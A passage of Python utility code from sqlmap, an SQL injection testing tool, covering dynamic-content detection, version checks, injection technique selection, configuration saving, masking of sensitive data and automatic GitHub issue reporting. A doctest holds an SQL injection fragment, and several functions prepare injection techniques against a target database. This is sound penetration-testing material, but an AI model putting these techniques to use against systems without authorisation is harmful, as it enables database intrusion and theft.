made\n\n    >>> findDynamicContent(\"Lorem ipsum dolor sit amet, congue tation referrentur ei sed. Ne nec legimus habemus recusabo, natum reque et per. Facer tritani reprehendunt eos id, modus constituam est te. Usu sumo indoctum ad, pri paulo molestiae complectitur no.\", \"Lorem ipsum dolor sit amet, congue tation referrentur ei sed. Ne nec legimus habemus recusabo, natum reque et per. <script src='ads.js'></script>Facer tritani reprehendunt eos id, modus constituam est te. Usu sumo indoctum ad, pri paulo molestiae complectitur no.\")\n    >>> kb.dynamicMarkings\n    [('natum reque et per. ', 'Facer tritani repreh')]\n    \"\"\"\n\n    if not firstPage or not secondPage:\n        return\n\n    infoMsg = \"searching for dynamic content\"\n    singleTimeLogMessage(infoMsg)\n\n    blocks = list(SequenceMatcher(None, firstPage, secondPage).get_matching_blocks())\n    kb.dynamicMarkings = []\n\n    # Removing too small matching blocks\n    for block in blocks[:]:\n        (_, _, length) = block\n\n        if length <= 2 * DYNAMICITY_BOUNDARY_LENGTH:\n            blocks.remove(block)\n\n    # Making of dynamic markings based on prefix/suffix principle\n    if len(blocks) > 0:\n        blocks.insert(0, None)\n        blocks.append(None)\n\n        for i in xrange(len(blocks) - 1):\n            prefix = firstPage[blocks[i][0]:blocks[i][0] + blocks[i][2]] if blocks[i] else None\n            suffix = firstPage[blocks[i + 1][0]:blocks[i + 1][0] + blocks[i + 1][2]] if blocks[i + 1] else None\n\n            if prefix is None and blocks[i + 1][0] == 0:\n                continue\n\n            if suffix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)):\n                continue\n\n            if prefix and suffix:\n                prefix = prefix[-DYNAMICITY_BOUNDARY_LENGTH:]\n                suffix = suffix[:DYNAMICITY_BOUNDARY_LENGTH]\n\n                for _ in (firstPage, secondPage):\n                    match = re.search(r\"(?s)%s(.+)%s\" % (re.escape(prefix), re.escape(suffix)), _)\n                    if match:\n                        infix = match.group(1)\n                        if infix[0].isalnum():\n                            prefix = trimAlphaNum(prefix)\n                        if infix[-1].isalnum():\n                            suffix = trimAlphaNum(suffix)\n                        break\n\n            kb.dynamicMarkings.append((prefix if prefix else None, suffix if suffix else None))\n\n    if len(kb.dynamicMarkings) > 0:\n        infoMsg = \"dynamic content marked for removal (%d region%s)\" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '')\n        singleTimeLogMessage(infoMsg)\n\ndef removeDynamicContent(page):\n    \"\"\"\n    Removing dynamic content from supplied page basing removal on\n    precalculated dynamic markings\n    \"\"\"\n\n    if page:\n        for item in kb.dynamicMarkings:\n            prefix, suffix = item\n\n            if prefix is None and suffix is None:\n                continue\n            elif prefix is None:\n                page = re.sub(r\"(?s)^.+%s\" % re.escape(suffix), suffix.replace('\\\\', r'\\\\'), page)\n            elif suffix is None:\n                page = re.sub(r\"(?s)%s.+$\" % re.escape(prefix), prefix.replace('\\\\', r'\\\\'), page)\n            else:\n                page = re.sub(r\"(?s)%s.+%s\" % (re.escape(prefix), re.escape(suffix)), \"%s%s\" % (prefix.replace('\\\\', r'\\\\'), suffix.replace('\\\\', r'\\\\')), page)\n\n    return page\n\ndef filterStringValue(value, charRegex, replacement=\"\"):\n    \"\"\"\n    Returns string value consisting only of chars satisfying supplied\n    regular expression (note: it has to be in form [...])\n\n    >>> filterStringValue('wzydeadbeef0123#', r'[0-9a-f]')\n    'deadbeef0123'\n    \"\"\"\n\n    retVal = value\n\n    if value:\n        retVal = re.sub(charRegex.replace(\"[\", \"[^\") if \"[^\" not in charRegex else charRegex.replace(\"[^\", \"[\"), replacement, value)\n\n    return retVal\n\ndef filterControlChars(value, replacement=' '):\n    \"\"\"\n    Returns string value with control chars being supstituted with replacement character\n\n    >>> filterControlChars('AND 1>(2+3)\\\\n--')\n    'AND 1>(2+3) --'\n    \"\"\"\n\n    return filterStringValue(value, PRINTABLE_CHAR_REGEX, replacement)\n\ndef filterNone(values):\n    \"\"\"\n    Emulates filterNone([...]) functionality\n\n    >>> filterNone([1, 2, \"\", None, 3])\n    [1, 2, 3]\n    \"\"\"\n\n    retVal = values\n\n    if isinstance(values, _collections.Iterable):\n        retVal = [_ for _ in values if _]\n\n    return retVal\n\ndef isDBMSVersionAtLeast(minimum):\n    \"\"\"\n    Checks if the recognized DBMS version is at least the version specified\n\n    >>> pushValue(kb.dbmsVersion)\n    >>> kb.dbmsVersion = \"2\"\n    >>> isDBMSVersionAtLeast(\"1.3.4.1.4\")\n    True\n    >>> isDBMSVersionAtLeast(2.1)\n    False\n    >>> isDBMSVersionAtLeast(\">2\")\n    False\n    >>> isDBMSVersionAtLeast(\">=2.0\")\n    True\n    >>> kb.dbmsVersion = \"<2\"\n    >>> isDBMSVersionAtLeast(\"2\")\n    False\n    >>> isDBMSVersionAtLeast(\"1.5\")\n    True\n    >>> kb.dbmsVersion = \"MySQL 5.4.3-log4\"\n    >>> isDBMSVersionAtLeast(\"5\")\n    True\n    >>> kb.dbmsVersion = popValue()\n    \"\"\"\n\n    retVal = None\n\n    if not any(isNoneValue(_) for _ in (Backend.getVersion(), minimum)) and Backend.getVersion() != UNKNOWN_DBMS_VERSION:\n        version = Backend.getVersion().replace(\" \", \"\").rstrip('.')\n\n        correction = 0.0\n        if \">=\" in version:\n            pass\n        elif '>' in version:\n            correction = VERSION_COMPARISON_CORRECTION\n        elif '<' in version:\n            correction = -VERSION_COMPARISON_CORRECTION\n\n        version = extractRegexResult(r\"(?P<result>[0-9][0-9.]*)\", version)\n\n        if version:\n            if '.' in version:\n                parts = version.split('.', 1)\n                parts[1] = filterStringValue(parts[1], '[0-9]')\n                version = '.'.join(parts)\n\n            try:\n                version = float(filterStringValue(version, '[0-9.]')) + correction\n            except ValueError:\n                return None\n\n            if isinstance(minimum, six.string_types):\n                if '.' in minimum:\n                    parts = minimum.split('.', 1)\n                    parts[1] = filterStringValue(parts[1], '[0-9]')\n                    minimum = '.'.join(parts)\n\n                correction = 0.0\n                if minimum.startswith(\">=\"):\n                    pass\n                elif minimum.startswith(\">\"):\n                    correction = VERSION_COMPARISON_CORRECTION\n\n                minimum = float(filterStringValue(minimum, '[0-9.]')) + correction\n\n            retVal = version >= minimum\n\n    return retVal\n\ndef parseSqliteTableSchema(value):\n    \"\"\"\n    Parses table column names and types from specified SQLite table schema\n\n    >>> kb.data.cachedColumns = {}\n    >>> parseSqliteTableSchema(\"CREATE TABLE users(\\\\n\\\\t\\\\tid INTEGER,\\\\n\\\\t\\\\tname TEXT\\\\n);\")\n    True\n    >>> repr(kb.data.cachedColumns).count(',') == 1\n    True\n    \"\"\"\n\n    retVal = False\n\n    if value:\n        table = {}\n        columns = {}\n\n        for match in re.finditer(r\"[(,]\\s*[\\\"'`]?(\\w+)[\\\"'`]?(?:\\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|LONGTEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\\b)?\", decodeStringEscape(value), re.I):\n            retVal = True\n            columns[match.group(1)] = match.group(2) or \"TEXT\"\n\n        table[safeSQLIdentificatorNaming(conf.tbl, True)] = columns\n        kb.data.cachedColumns[conf.db] = table\n\n    return retVal\n\ndef getTechniqueData(technique=None):\n    \"\"\"\n    Returns injection data for technique specified\n    \"\"\"\n\n    return kb.injection.data.get(technique if technique is not None else getTechnique())\n\ndef isTechniqueAvailable(technique):\n    \"\"\"\n    Returns True if there is injection data which sqlmap could use for technique specified\n\n    >>> pushValue(kb.injection.data)\n    >>> kb.injection.data[PAYLOAD.TECHNIQUE.ERROR] = [test for test in getSortedInjectionTests() if \"error\" in test[\"title\"].lower()][0]\n    >>> isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR)\n    True\n    >>> kb.injection.data = popValue()\n    \"\"\"\n\n    if conf.technique and isinstance(conf.technique, list) and technique not in conf.technique:\n        return False\n    else:\n        return getTechniqueData(technique) is not None\n\ndef isHeavyQueryBased(technique=None):\n    \"\"\"\n    Returns True whether current (kb.)technique is heavy-query based\n\n    >>> pushValue(kb.injection.data)\n    >>> setTechnique(PAYLOAD.TECHNIQUE.STACKED)\n    >>> kb.injection.data[getTechnique()] = [test for test in getSortedInjectionTests() if \"heavy\" in test[\"title\"].lower()][0]\n    >>> isHeavyQueryBased()\n    True\n    >>> kb.injection.data = popValue()\n    \"\"\"\n\n    retVal = False\n\n    technique = technique or getTechnique()\n\n    if isTechniqueAvailable(technique):\n        data = getTechniqueData(technique)\n        if data and \"heavy query\" in data[\"title\"].lower():\n            retVal = True\n\n    return retVal\n\ndef isStackingAvailable():\n    \"\"\"\n    Returns True whether techniques using stacking are available\n\n    >>> pushValue(kb.injection.data)\n    >>> kb.injection.data[PAYLOAD.TECHNIQUE.STACKED] = [test for test in getSortedInjectionTests() if \"stacked\" in test[\"title\"].lower()][0]\n    >>> isStackingAvailable()\n    True\n    >>> kb.injection.data = popValue()\n    \"\"\"\n\n    retVal = False\n\n    if PAYLOAD.TECHNIQUE.STACKED in kb.injection.data:\n        retVal = True\n    else:\n        for technique in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True):\n            data = getTechniqueData(technique)\n            if data and \"stacked\" in data[\"title\"].lower():\n                retVal = True\n                break\n\n    return retVal\n\ndef isInferenceAvailable():\n    \"\"\"\n    Returns True whether techniques using inference technique are available\n\n    >>> pushValue(kb.injection.data)\n    >>> kb.injection.data[PAYLOAD.TECHNIQUE.BOOLEAN] = getSortedInjectionTests()[0]\n    >>> isInferenceAvailable()\n    True\n    >>> kb.injection.data = popValue()\n    \"\"\"\n\n    return any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.STACKED, PAYLOAD.TECHNIQUE.TIME))\n\ndef setOptimize():\n    \"\"\"\n    Sets options turned on by switch '-o'\n    \"\"\"\n\n    # conf.predictOutput = True\n    conf.keepAlive = True\n    conf.threads = 3 if conf.threads < 3 and cmdLineOptions.threads is None else conf.threads\n    conf.nullConnection = not any((conf.data, conf.textOnly, conf.titles, conf.string, conf.notString, conf.regexp, conf.tor))\n\n    if not conf.nullConnection:\n        debugMsg = \"turning off switch '--null-connection' used indirectly by switch '-o'\"\n        logger.debug(debugMsg)\n\ndef saveConfig(conf, filename):\n    \"\"\"\n    Saves conf to configuration filename\n    \"\"\"\n\n    config = UnicodeRawConfigParser()\n    userOpts = {}\n\n    for family in optDict:\n        userOpts[family] = []\n\n    for option, value in conf.items():\n        for family, optionData in optDict.items():\n            if option in optionData:\n                userOpts[family].append((option, value, optionData[option]))\n\n    for family, optionData in userOpts.items():\n        config.add_section(family)\n\n        optionData.sort()\n\n        for option, value, datatype in optionData:\n            if datatype and isListLike(datatype):\n                datatype = datatype[0]\n\n            if option in IGNORE_SAVE_OPTIONS:\n                continue\n\n            if value is None:\n                if datatype == OPTION_TYPE.BOOLEAN:\n                    value = \"False\"\n                elif datatype in (OPTION_TYPE.INTEGER, OPTION_TYPE.FLOAT):\n                    if option in defaults:\n                        value = str(defaults[option])\n                    else:\n                        value = '0'\n                elif datatype == OPTION_TYPE.STRING:\n                    value = \"\"\n\n            if isinstance(value, six.string_types):\n                value = value.replace(\"\\n\", \"\\n \")\n\n            config.set(family, option, value)\n\n    with openFile(filename, \"wb\") as f:\n        try:\n            config.write(f)\n        except IOError as ex:\n            errMsg = \"something went wrong while trying \"\n            errMsg += \"to write to the configuration file '%s' ('%s')\" % (filename, getSafeExString(ex))\n            raise SqlmapSystemException(errMsg)\n\ndef initTechnique(technique=None):\n    \"\"\"\n    Prepares data for technique specified\n    \"\"\"\n\n    try:\n        data = getTechniqueData(technique)\n        resetCounter(technique)\n\n        if data:\n            kb.pageTemplate, kb.errorIsNone = getPageTemplate(data.templatePayload, kb.injection.place)\n            kb.matchRatio = data.matchRatio\n            kb.negativeLogic = (technique == PAYLOAD.TECHNIQUE.BOOLEAN) and (data.where == PAYLOAD.WHERE.NEGATIVE)\n\n            # Restoring stored conf options\n            for key, value in kb.injection.conf.items():\n                if value and (not hasattr(conf, key) or (hasattr(conf, key) and not getattr(conf, key))):\n                    setattr(conf, key, value)\n                    debugMsg = \"resuming configuration option '%s' (%s)\" % (key, (\"'%s'\" % value) if isinstance(value, six.string_types) else value)\n                    logger.debug(debugMsg)\n\n                    if value and key == \"optimize\":\n                        setOptimize()\n        else:\n            warnMsg = \"there is no injection data available for technique \"\n            warnMsg += \"'%s'\" % enumValueToNameLookup(PAYLOAD.TECHNIQUE, technique)\n            logger.warning(warnMsg)\n\n    except SqlmapDataException:\n        errMsg = \"missing data in old session file(s). \"\n        errMsg += \"Please use '--flush-session' to deal \"\n        errMsg += \"with this error\"\n        raise SqlmapNoneDataException(errMsg)\n\ndef arrayizeValue(value):\n    \"\"\"\n    Makes a list out of value if it is not already a list or tuple itself\n\n    >>> arrayizeValue('1')\n    ['1']\n    \"\"\"\n\n    if isinstance(value, _collections.KeysView):\n        value = [_ for _ in value]\n    elif not isListLike(value):\n        value = [value]\n\n    return value\n\ndef unArrayizeValue(value):\n    \"\"\"\n    Makes a value out of iterable if it is a list or tuple itself\n\n    >>> unArrayizeValue(['1'])\n    '1'\n    >>> unArrayizeValue('1')\n    '1'\n    >>> unArrayizeValue(['1', '2'])\n    '1'\n    >>> unArrayizeValue([['a', 'b'], 'c'])\n    'a'\n    >>> unArrayizeValue(_ for _ in xrange(10))\n    0\n    \"\"\"\n\n    if isListLike(value):\n        if not value:\n            value = None\n        elif len(value) == 1 and not isListLike(value[0]):\n            value = value[0]\n        else:\n            value = [_ for _ in flattenValue(value) if _ is not None]\n            value = value[0] if len(value) > 0 else None\n    elif inspect.isgenerator(value):\n        value = unArrayizeValue([_ for _ in value])\n\n    return value\n\ndef flattenValue(value):\n    \"\"\"\n    Returns an iterator representing flat representation of a given value\n\n    >>> [_ for _ in flattenValue([['1'], [['2'], '3']])]\n    ['1', '2', '3']\n    \"\"\"\n\n    for i in iter(value):\n        if isListLike(i):\n            for j in flattenValue(i):\n                yield j\n        else:\n            yield i\n\ndef joinValue(value, delimiter=','):\n    \"\"\"\n    Returns a value consisting of joined parts of a given value\n\n    >>> joinValue(['1', '2'])\n    '1,2'\n    >>> joinValue('1')\n    '1'\n    \"\"\"\n\n    if isListLike(value):\n        retVal = delimiter.join(value)\n    else:\n        retVal = value\n\n    return retVal\n\ndef isListLike(value):\n    \"\"\"\n    Returns True if the given value is a list-like instance\n\n    >>> isListLike([1, 2, 3])\n    True\n    >>> isListLike('2')\n    False\n    \"\"\"\n\n    return isinstance(value, (list, tuple, set, OrderedSet, BigArray))\n\ndef getSortedInjectionTests():\n    \"\"\"\n    Returns prioritized test list by eventually detected DBMS from error messages\n\n    >>> pushValue(kb.forcedDbms)\n    >>> kb.forcedDbms = DBMS.SQLITE\n    >>> [test for test in getSortedInjectionTests() if hasattr(test, \"details\") and hasattr(test.details, \"dbms\")][0].details.dbms == kb.forcedDbms\n    True\n    >>> kb.forcedDbms = popValue()\n    \"\"\"\n\n    retVal = copy.deepcopy(conf.tests)\n\n    def priorityFunction(test):\n        retVal = SORT_ORDER.FIRST\n\n        if test.stype == PAYLOAD.TECHNIQUE.UNION:\n            retVal = SORT_ORDER.LAST\n\n        elif \"details\" in test and \"dbms\" in (test.details or {}):\n            if intersect(test.details.dbms, Backend.getIdentifiedDbms()):\n                retVal = SORT_ORDER.SECOND\n            else:\n                retVal = SORT_ORDER.THIRD\n\n        return retVal\n\n    if Backend.getIdentifiedDbms():\n        retVal = sorted(retVal, key=priorityFunction)\n\n    return retVal\n\ndef filterListValue(value, regex):\n    \"\"\"\n    Returns list with items that have parts satisfying given regular expression\n\n    >>> filterListValue(['users', 'admins', 'logs'], r'(users|admins)')\n    ['users', 'admins']\n    \"\"\"\n\n    if isinstance(value, list) and regex:\n        retVal = [_ for _ in value if re.search(regex, _, re.I)]\n    else:\n        retVal = value\n\n    return retVal\n\ndef showHttpErrorCodes():\n    \"\"\"\n    Shows all HTTP error codes raised till now\n    \"\"\"\n\n    if kb.httpErrorCodes:\n        warnMsg = \"HTTP error codes detected during run:\\n\"\n        warnMsg += \", \".join(\"%d (%s) - %d times\" % (code, _http_client.responses[code] if code in _http_client.responses else '?', count) for code, count in kb.httpErrorCodes.items())\n        logger.warning(warnMsg)\n        if any((str(_).startswith('4') or str(_).startswith('5')) and _ != _http_client.INTERNAL_SERVER_ERROR and _ != kb.originalCode for _ in kb.httpErrorCodes):\n            msg = \"too many 4xx and/or 5xx HTTP error codes \"\n            msg += \"could mean that some kind of protection is involved (e.g. WAF)\"\n            logger.debug(msg)\n\ndef openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors=\"reversible\", buffering=1):  # \"buffering=1\" means line buffered (Reference: http://stackoverflow.com/a/3168436)\n    \"\"\"\n    Returns file handle of a given filename\n\n    >>> \"openFile\" in openFile(__file__).read()\n    True\n    >>> b\"openFile\" in openFile(__file__, \"rb\", None).read()\n    True\n    \"\"\"\n\n    # Reference: https://stackoverflow.com/a/37462452\n    if 'b' in mode:\n        buffering = 0\n\n    if filename == STDIN_PIPE_DASH:\n        if filename not in kb.cache.content:\n            kb.cache.content[filename] = sys.stdin.read()\n\n        return contextlib.closing(io.StringIO(readCachedFileContent(filename)))\n    else:\n        try:\n            return codecs.open(filename, mode, encoding, errors, buffering)\n        except IOError:\n            errMsg = \"there has been a file opening error for filename '%s'. \" % filename\n            errMsg += \"Please check %s permissions on a file \" % (\"write\" if mode and ('w' in mode or 'a' in mode or '+' in mode) else \"read\")\n            errMsg += \"and that it's not locked by another process\"\n            raise SqlmapSystemException(errMsg)\n\ndef decodeIntToUnicode(value):\n    \"\"\"\n    Decodes inferenced integer value to an unicode character\n\n    >>> decodeIntToUnicode(35) == '#'\n    True\n    >>> decodeIntToUnicode(64) == '@'\n    True\n    \"\"\"\n    retVal = value\n\n    if isinstance(value, int):\n        try:\n            if value > 255:\n                _ = \"%x\" % value\n\n                if len(_) % 2 == 1:\n                    _ = \"0%s\" % _\n\n                raw = decodeHex(_)\n\n                if Backend.isDbms(DBMS.MYSQL):\n                    # Reference: https://dev.mysql.com/doc/refman/8.0/en/string-functions.html#function_ord\n                    # Note: https://github.com/sqlmapproject/sqlmap/issues/1531\n                    retVal = getUnicode(raw, conf.encoding or UNICODE_ENCODING)\n                elif Backend.isDbms(DBMS.MSSQL):\n                    # Reference: https://docs.microsoft.com/en-us/sql/relational-databases/collations/collation-and-unicode-support?view=sql-server-2017 and https://stackoverflow.com/a/14488478\n                    retVal = getUnicode(raw, \"UTF-16-BE\")\n                elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE):     # Note: cases with Unicode code points (e.g. http://www.postgresqltutorial.com/postgresql-ascii/)\n                    retVal = _unichr(value)\n                else:\n                    retVal = getUnicode(raw, conf.encoding)\n            else:\n                retVal = _unichr(value)\n        except:\n            retVal = INFERENCE_UNKNOWN_CHAR\n\n    return retVal\n\ndef checkIntegrity():\n    \"\"\"\n    Checks integrity of code files during the unhandled exceptions\n    \"\"\"\n\n    if not paths:\n        return\n\n    logger.debug(\"running code integrity check\")\n\n    retVal = True\n\n    baseTime = os.path.getmtime(paths.SQLMAP_SETTINGS_PATH) + 3600  # First hour free parking :)\n    for root, _, filenames in os.walk(paths.SQLMAP_ROOT_PATH):\n        for filename in filenames:\n            if re.search(r\"(\\.py|\\.xml|_)\\Z\", filename):\n                filepath = os.path.join(root, filename)\n                if os.path.getmtime(filepath) > baseTime:\n                    logger.error(\"wrong modification time of '%s'\" % filepath)\n                    retVal = False\n\n    return retVal\n\ndef getDaysFromLastUpdate():\n    \"\"\"\n    Get total number of days from last update\n\n    >>> getDaysFromLastUpdate() >= 0\n    True\n    \"\"\"\n\n    if not paths:\n        return\n\n    return int(time.time() - os.path.getmtime(paths.SQLMAP_SETTINGS_PATH)) // (3600 * 24)\n\ndef unhandledExceptionMessage():\n    \"\"\"\n    Returns detailed message about occurred unhandled exception\n\n    >>> all(_ in unhandledExceptionMessage() for _ in (\"unhandled exception occurred\", \"Operating system\", \"Command line\"))\n    True\n    \"\"\"\n\n    errMsg = \"unhandled exception occurred in %s. It is recommended to retry your \" % VERSION_STRING\n    errMsg += \"run with the latest development version from official GitHub \"\n    errMsg += \"repository at '%s'. If the exception persists, please open a new issue \" % GIT_PAGE\n    errMsg += \"at '%s' \" % ISSUES_PAGE\n    errMsg += \"with the following text and any other information required to \"\n    errMsg += \"reproduce the bug. Developers will try to reproduce the bug, fix it accordingly \"\n    errMsg += \"and get back to you\\n\"\n    errMsg += \"Running version: %s\\n\" % VERSION_STRING[VERSION_STRING.find('/') + 1:]\n    errMsg += \"Python version: %s\\n\" % PYVERSION\n    errMsg += \"Operating system: %s\\n\" % platform.platform()\n    errMsg += \"Command line: %s\\n\" % re.sub(r\".+?\\bsqlmap\\.py\\b\", \"sqlmap.py\", getUnicode(\" \".join(sys.argv), encoding=getattr(sys.stdin, \"encoding\", None)))\n    errMsg += \"Technique: %s\\n\" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, getTechnique()) if getTechnique() is not None else (\"DIRECT\" if conf.get(\"direct\") else None))\n    errMsg += \"Back-end DBMS:\"\n\n    if Backend.getDbms() is not None:\n        errMsg += \" %s (fingerprinted)\" % Backend.getDbms()\n\n    if Backend.getIdentifiedDbms() is not None and (Backend.getDbms() is None or Backend.getIdentifiedDbms() != Backend.getDbms()):\n        errMsg += \" %s (identified)\" % Backend.getIdentifiedDbms()\n\n    if not errMsg.endswith(')'):\n        errMsg += \" None\"\n\n    return errMsg\n\ndef getLatestRevision():\n    \"\"\"\n    Retrieves latest revision from the offical repository\n    \"\"\"\n\n    retVal = None\n    req = _urllib.request.Request(url=\"https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/lib/core/settings.py\", headers={HTTP_HEADER.USER_AGENT: fetchRandomAgent()})\n\n    try:\n        content = getUnicode(_urllib.request.urlopen(req).read())\n        retVal = extractRegexResult(r\"VERSION\\s*=\\s*[\\\"'](?P<result>[\\d.]+)\", content)\n    except:\n        pass\n\n    return retVal\n\ndef fetchRandomAgent():\n    \"\"\"\n    Returns random HTTP User-Agent header value\n\n    >>> '(' in fetchRandomAgent()\n    True\n    \"\"\"\n\n    if not kb.userAgents:\n        debugMsg = \"loading random HTTP User-Agent header(s) from \"\n        debugMsg += \"file '%s'\" % paths.USER_AGENTS\n        logger.debug(debugMsg)\n\n        try:\n            kb.userAgents = getFileItems(paths.USER_AGENTS)\n        except IOError:\n            errMsg = \"unable to read HTTP User-Agent header \"\n            errMsg += \"file '%s'\" % paths.USER_AGENTS\n            raise SqlmapSystemException(errMsg)\n\n    return random.sample(kb.userAgents, 1)[0]\n\ndef createGithubIssue(errMsg, excMsg):\n    \"\"\"\n    Automatically create a Github issue with unhandled exception information\n    \"\"\"\n\n    try:\n        issues = getFileItems(paths.GITHUB_HISTORY, unique=True)\n    except:\n        issues = []\n    finally:\n        issues = set(issues)\n\n    _ = re.sub(r\"'[^']+'\", \"''\", excMsg)\n    _ = re.sub(r\"\\s+line \\d+\", \"\", _)\n    _ = re.sub(r'File \".+?/(\\w+\\.py)', r\"\\g<1>\", _)\n    _ = re.sub(r\".+\\Z\", \"\", _)\n    _ = re.sub(r\"(Unicode[^:]*Error:).+\", r\"\\g<1>\", _)\n    _ = re.sub(r\"= _\", \"= \", _)\n\n    key = hashlib.md5(getBytes(_)).hexdigest()[:8]\n\n    if key in issues:\n        return\n\n    msg = \"\\ndo you want to automatically create a new (anonymized) issue \"\n    msg += \"with the unhandled exception information at \"\n    msg += \"the official Github repository? [y/N] \"\n    try:\n        choice = readInput(msg, default='N', checkBatch=False, boolean=True)\n    except:\n        choice = None\n\n    if choice:\n        _excMsg = None\n        errMsg = errMsg[errMsg.find(\"\\n\"):]\n\n        req = _urllib.request.Request(url=\"https://api.github.com/search/issues?q=%s\" % _urllib.parse.quote(\"repo:sqlmapproject/sqlmap Unhandled exception (#%s)\" % key), headers={HTTP_HEADER.USER_AGENT: fetchRandomAgent()})\n\n        try:\n            content = _urllib.request.urlopen(req).read()\n            _ = json.loads(content)\n            duplicate = _[\"total_count\"] > 0\n            closed = duplicate and _[\"items\"][0][\"state\"] == \"closed\"\n            if duplicate:\n                warnMsg = \"issue seems to be already reported\"\n                if closed:\n                    warnMsg += \" and resolved. Please update to the latest \"\n                    warnMsg += \"development version from official GitHub repository at '%s'\" % GIT_PAGE\n                logger.warning(warnMsg)\n                return\n        except:\n            pass\n\n        data = {\"title\": \"Unhandled exception (#%s)\" % key, \"body\": \"```%s\\n```\\n```\\n%s```\" % (errMsg, excMsg)}\n        req = _urllib.request.Request(url=\"https://api.github.com/repos/sqlmapproject/sqlmap/issues\", data=getBytes(json.dumps(data)), headers={HTTP_HEADER.AUTHORIZATION: \"token %s\" % decodeBase64(GITHUB_REPORT_OAUTH_TOKEN, binary=False), HTTP_HEADER.USER_AGENT: fetchRandomAgent()})\n\n        try:\n            content = getText(_urllib.request.urlopen(req).read())\n        except Exception as ex:\n            content = None\n            _excMsg = getSafeExString(ex)\n\n        issueUrl = re.search(r\"https://github.com/sqlmapproject/sqlmap/issues/\\d+\", content or \"\")\n        if issueUrl:\n            infoMsg = \"created Github issue can been found at the address '%s'\" % issueUrl.group(0)\n            logger.info(infoMsg)\n\n            try:\n                with openFile(paths.GITHUB_HISTORY, \"a+b\") as f:\n                    f.write(\"%s\\n\" % key)\n            except:\n                pass\n        else:\n            warnMsg = \"something went wrong while creating a Github issue\"\n            if _excMsg:\n                warnMsg += \" ('%s')\" % _excMsg\n            if \"Unauthorized\" in warnMsg:\n                warnMsg += \". Please update to the latest revision\"\n            logger.warning(warnMsg)\n\ndef maskSensitiveData(msg):\n    \"\"\"\n    Masks sensitive data in the supplied message\n\n    >>> maskSensitiveData('python sqlmap.py -u \"http://www.test.com/vuln.php?id=1\" --banner') == 'python sqlmap.py -u *********************************** --banner'\n    True\n    >>> maskSensitiveData('sqlmap.py -u test.com/index.go?id=index') == 'sqlmap.py -u **************************'\n    True\n    \"\"\"\n\n    retVal = getUnicode(msg)\n\n    for item in filterNone(conf.get(_) for _ in SENSITIVE_OPTIONS):\n        if isListLike(item):\n            item = listToStrValue(item)\n\n        regex = SENSITIVE_DATA_REGEX % re.sub(r\"(\\W)\", r\"\\\\\\1\", getUnicode(item))\n        while extractRegexResult(regex, retVal):\n            value = extractRegexResult(regex, retVal)\n            retVal = retVal.replace(value, '*' * len(value))\n\n    # Just in case (for problematic parameters regarding user encoding)\n    for match in re.finditer(r\"(?i)[ -]-(u|url|data|cookie|auth-\\w+|proxy|host|referer|headers?|H)( |=)(.*?)(?= -?-[a-z]|\\Z)\", retVal):\n        retVal = retVal.replace(match.group(3), '*' * len(match.group(3)))\n\n    # Fail-safe substitutions\n    retVal = re.sub(r\"(?i)(Command line:.+)\\b(https?://[^ ]+)\", lambda match: \"%s%s\" % (match.group(1), '*' * len(match.group(2))), retVal)\n    retVal = re.sub(r\"(?i)(\\b\\w:[\\\\/]+Users[\\\\/]+|[\\\\/]+home[\\\\/]+)([^\\\\/]+)\", lambda match: \"%s%s\" % (match.group(1), '*' * len(match.group(2))), retVal)\n\n    if getpass.getuser():\n        retVal = re.sub(r\"(?i)\\b%s\\b\" % re.escape(getpass.getuser()), '*' * len(getpass.getuser()), retVal)\n\n    return retVal\n\ndef listToStrValue(value):\n    \"\"\"\n    Flattens list to a string value\n\n    >>> listToStrValue([1,2,3])\n    '1, 2, 3'\n    \"\"\"\n\n    if isinstance(value, (set, tuple, types.GeneratorType)):\n        value = list(value)\n\n    if isinstance(value, list):\n        retVal = value.__str__().lstrip('[').rstrip(']')\n    else:\n        retVal = value\n\n    return retVal\n\ndef intersect(containerA, containerB, lowerCase=False):\n    \"\"\"\n    Returns intersection of the container-ized values\n\n    >>> intersect([1, 2, 3], set([1,3]))\n    [1, 3]\n    \"\"\"\n\n    retVal = []\n\n    if containerA and containerB:\n        containerA = arrayizeValue(containerA)\n        containerB = arrayizeValue(containerB)\n\n        if lowerCase:\n            containerA = [val.lower() if hasattr(val, \"lower\") else val for val in containerA]\n            containerB = [val.lower() if hasattr(val, \"lower\") else val for val in containerB]\n\n        retVal = [val for val in containerA if val in containerB]\n\n    return retVal\n\ndef decodeStringEscape(value):\n    \"\"\"\n    Decodes escaped string values (e.g. \"\\\\t\" -> \"\\t\")\n    \"\"\"\n\n    retVal = value\n\n    if value and '\\\\' in value:\n        charset = \"\\\\%s\" % string.whitespace.replace(\" \", \"\")\n        for _ in charset:\n            retVal = retVal.replace(repr(_).strip(\"'\"), _)\n\n    return retVal\n\ndef encodeStringEscape(value):\n    \"\"\"\n    Encodes escaped string values (e.g. \"\\t\" -> \"\\\\t\")\n    \"\"\"\n\n    retVal = value\n\n    if value:\n        charset = \"\\\\%s\" % string.whitespace.replace(\" \", \"\")\n        for _ in charset:\n            retVal = retVal.replace(_, repr(_).strip(\"'\"))\n\n    return retVal\n\ndef removeReflectiveValues(content, payload, suppressWarning=False):\n    \"\"\"\n    Neutralizes reflective values in a given content based on a payload\n    (e.g. ..search.php?q=1 AND 1=2 --> \"...searching for <b>1%20AND%201%3D2</b>...\" --> \"...searching for <b>__REFLECTED_VALUE__</b>...\")\n    \"\"\"\n\n    retVal = content\n\n    try:\n        if all((content, payload)) and isinstance(content, six.text_type) and kb.reflectiveMechanism and not kb.heuristicMode:\n            def _(value):\n                while 2 * REFLECTED_REPLACEMENT_REGEX in value:\n                    value = value.replace(2 * 